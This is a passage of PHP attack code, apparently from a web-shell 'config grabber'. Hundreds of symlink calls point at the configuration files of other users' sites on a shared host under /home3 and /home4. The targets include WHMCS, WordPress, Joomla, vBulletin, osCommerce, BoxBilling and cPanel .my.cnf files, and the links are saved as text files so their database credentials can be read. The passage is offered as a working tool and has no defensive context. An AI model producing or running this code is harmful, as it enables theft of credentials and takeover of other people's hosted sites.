  1374. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1393. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1394. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1395. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1396. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1397. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1398. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1399. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1400. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1401. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1402. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1403. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1404. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1405. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1406. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1407. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1408. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1409. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1410. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1411. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1412. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1413. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1414. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1415. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1416. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1417. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1418. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1419. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1420. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1421. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1422. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1423. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1424. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1425. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1426. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1427. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1428. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1429. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1430. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1431. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1432. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1433. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1434. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1435. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1436. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1437. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1438. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1439. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1440. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1441. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1442. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1443. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1444. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1445. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1446. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1447. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1448. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1449. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1450. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1451. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1452. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1453. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1454. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1455. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1456. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1457. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1458. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1459. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1460. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1461. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1462. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1463. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1464. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1465. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1466. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1467. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1468. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1469. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1470. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1471. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1472. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1473. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1474. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1475. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1476. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1477. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1478. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1479. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1480. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1481. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1482. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1483. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1484. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1485. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1486. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1487. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1488. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1489. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1490. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1491. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1492. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1493. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1494. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1495. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1496. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1497. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1498. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1499. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1500. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1501. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1502. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1503. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1504. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1505. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1506. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1507. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1508. @symlink('/home3/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1509. @symlink('/home3/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1510. //Home4
  1511.  
  1512. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1513. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1514. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1515. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1516. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1517. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1518. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1519. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1520. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1521. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1522. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1523. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1524. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1525. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1526. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1527. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1528. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1529. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1530. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1531. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1532. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1533. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1534. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1535. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1536. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1537. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1538. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1539. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1540. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1541. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1542. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1543. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1544. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1545. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1546. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1547. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1548. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1549. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1550. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1551. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1552. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1553. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1554. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1555. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1556. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1557. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1558. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1576. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1577. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1578. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1579. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1580. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1581. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1582. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1583. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1584. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1585. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1586. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1587. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1588. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1589. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1590. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1591. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1592. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1593. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1594. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1595. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1596. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1597. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1598. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1599. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1600. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1601. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1602. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1603. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1604. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1605. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1606. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1607. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1608. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1609. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1610. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1611. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1612. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1613. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1614. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1615. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1616. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1617. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1618. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1619. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1620. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1621. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1622. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1623. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1624. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1625. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1626. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1627. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1628. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1629. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1630. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1631. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1632. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1633. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1634. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1635. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1636. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1637. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1638. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1639. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1640. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1641. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1642. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1643. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1644. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1645. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1646. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1647. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1648. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1649. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1650. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1651. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1652. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1653. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1654. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1655. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1656. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1657. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1658. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1659. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1660. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1661. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1662. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1663. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1664. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1665. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1666. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1667. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1668. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1669. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1670. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1671. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1672. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1673. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1674. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1675. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1676. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1677. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
